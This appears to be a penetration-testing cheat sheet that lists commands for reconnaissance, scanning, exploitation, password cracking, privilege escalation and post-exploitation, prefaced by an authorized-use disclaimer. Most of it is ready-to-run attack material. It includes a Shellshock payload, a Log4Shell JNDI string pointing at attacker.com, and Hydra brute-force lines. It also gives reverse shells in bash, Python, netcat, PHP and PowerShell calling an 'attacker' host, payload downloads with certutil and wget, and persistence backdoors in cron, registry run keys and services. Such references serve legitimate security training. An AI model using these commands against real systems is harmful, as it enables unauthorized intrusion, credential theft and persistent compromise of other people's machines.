
Penetration Testing

November 9, 2025

Essential commands for security assessments

Essential penetration testing commands for reconnaissance, exploitation, and post-exploitation. For authorized testing only.

Disclaimer

These tools and techniques are for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal.

Reconnaissance

Network Discovery

# Host discovery
nmap -sn 192.168.1.0/24               # Ping scan (no port scan)
nmap -sn -PS22,80,443 192.168.1.0/24  # TCP SYN ping
nmap -sn -PU53,161 192.168.1.0/24     # UDP ping

# Quick scan
nmap -T4 -F target                     # Fast scan (100 common ports)
nmap --top-ports 20 target             # Scan top 20 ports

# Comprehensive scan
nmap -sS -sV -O -p- -T4 target         # SYN scan, version, OS, all ports
nmap -A -T4 target                     # Aggressive scan
nmap -sC -sV target                    # Default scripts + version detection

Service Enumeration

# Banner grabbing
nc -v target 80                        # Manual banner grab
nmap -sV --version-intensity 5 target  # Version detection at an explicit probe intensity (0-9; nmap's default is 7, so 5 is lighter, not more aggressive)

# Specific services
nmap -p 445 --script smb-enum-shares target     # SMB shares
nmap -p 3306 --script mysql-info target         # MySQL info
nmap -p 1433 --script ms-sql-info target        # MSSQL info
nmap --script vuln target                        # Vulnerability scan

DNS Enumeration

# Zone transfer
dig axfr @ns1.target.com target.com
host -l target.com ns1.target.com

# Subdomain enumeration
fierce --domain target.com
amass enum -d target.com
subfinder -d target.com

# DNS brute force
dnsrecon -d target.com -t brt
dnsenum target.com

Web Reconnaissance

# Directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://target.com -w wordlist.txt
dirbuster (GUI)

# Subdomain enumeration
gobuster vhost -u https://target.com -w subdomains.txt
ffuf -w subdomains.txt -u https://FUZZ.target.com

# Technology detection
whatweb target.com
wappalyzer (browser extension)

Vulnerability Scanning

Automated Scanners

# Nessus (commercial)
/opt/nessus/sbin/nessus-service

# OpenVAS
gvm-setup
gvm-start

# Nikto (web scanner)
nikto -h https://target.com

# Nuclei (template-based)
nuclei -u https://target.com
nuclei -l urls.txt -t cves/

Web Application Scanning

# OWASP ZAP
zaproxy

# Burp Suite
burpsuite

# SQLMap
sqlmap -u "https://target.com/page?id=1"
sqlmap -u url --dbs                    # Enumerate databases
sqlmap -u url -D dbname --tables       # Enumerate tables
sqlmap -u url -D dbname -T users --dump # Dump table

# XSS Testing
dalfox url https://target.com/search?q=FUZZ

Exploitation

Metasploit Framework

msfconsole                             # Start Metasploit

# Basic workflow
search exploit_name
use exploit/path/to/module
show options
set RHOSTS target
set LHOST attacker_ip
exploit

Common Exploits

# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
exploit

# Shellshock
curl -A "() { :; }; /bin/bash -c 'cat /etc/passwd'" https://target.com/cgi-bin/test.cgi

# Log4Shell (CVE-2021-44228)
# Payload: ${jndi:ldap://attacker.com/a}

Password Attacks

Hydra

# SSH brute force
hydra -l user -P passwords.txt ssh://target

# HTTP POST form
hydra -l admin -P passwords.txt target http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# FTP
hydra -L users.txt -P passwords.txt ftp://target

# RDP
hydra -l administrator -P passwords.txt rdp://target

John the Ripper

# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt                  # Show cracked passwords

# Crack with rules
john --wordlist=wordlist.txt --rules hashes.txt

# Specific hash types
john --format=NT hashes.txt             # NTLM
john --format=raw-md5 hashes.txt        # MD5

Hashcat

# MD5
hashcat -m 0 hashes.txt wordlist.txt

# NTLM
hashcat -m 1000 hashes.txt wordlist.txt

# WPA/WPA2
hashcat -m 2500 capture.hccapx wordlist.txt

# With rules
hashcat -m 0 hashes.txt wordlist.txt -r rules/best64.rule

Post-Exploitation

Linux Privilege Escalation

# System enumeration
uname -a                               # Kernel version
cat /etc/issue                         # OS version
cat /etc/passwd                        # Users
cat /etc/shadow                        # Password hashes (if readable)
sudo -l                                # Sudo permissions

# Find SUID binaries
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# World-writable files
find / -writable -type f 2>/dev/null

# Capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# LinPEAS (automated; this pipes an unverified download straight into sh — fetch the script, inspect it and check its release checksum before running it)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows Privilege Escalation

# System info
systeminfo
whoami /priv
whoami /groups

# Find files
dir /s *pass* == *cred* == *vnc* == *.config*

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# WinPEAS (automated)
winpeas.exe

# PowerUp (PowerShell)
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

File Transfer

# HTTP server (attacker)
python3 -m http.server 8000
php -S 0.0.0.0:8000

# Download (victim Linux)
wget http://attacker:8000/file
curl http://attacker:8000/file -o file

# Download (victim Windows)
certutil -urlcache -f http://attacker:8000/file file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://attacker:8000/file','file.exe')"

# SCP
scp file user@target:/tmp/

# Base64 transfer
base64 file | nc target 4444           # Sender (run after the receiver is listening)
nc -l 4444 | base64 -d > file          # Receiver (start this first)

Shells & Backdoors

Reverse Shells

# Bash
bash -i >& /dev/tcp/attacker/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Netcat
nc -e /bin/sh attacker 4444

# PHP
php -r '$sock=fsockopen("attacker",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Listeners

# Netcat listener
nc -lvnp 4444

# Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit

Shell Upgrade

# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
export TERM=xterm

# Script
script /dev/null -c bash

Persistence

Linux

# SSH key
mkdir /root/.ssh
echo "ssh-rsa AAAA..." > /root/.ssh/authorized_keys

# Cron job
echo "* * * * * /tmp/.backdoor" > /etc/cron.d/persist

# .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc

Windows

# Scheduled task
schtasks /create /tn "Update" /tr C:\backdoor.exe /sc onlogon /ru System

# Registry run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\backdoor.exe"

# Service
sc create backdoor binpath= "C:\backdoor.exe" start= auto
sc start backdoor

Useful Tools

# SearchSploit
searchsploit apache 2.4.49
searchsploit -m exploit_id              # Mirror exploit

# Exploit-DB
https://www.exploit-db.com/

# GTFOBins (Linux privilege escalation)
https://gtfobins.github.io/

# LOLBAS (Windows living-off-the-land)
https://lolbas-project.github.io/

# CrackStation (hash lookup)
https://crackstation.net/

# CyberChef (data manipulation)
https://gchq.github.io/CyberChef/

Reporting

Always document:

  • Scope and methodology
  • Findings with severity ratings
  • Proof of concept with screenshots
  • Remediation recommendations
  • Executive summary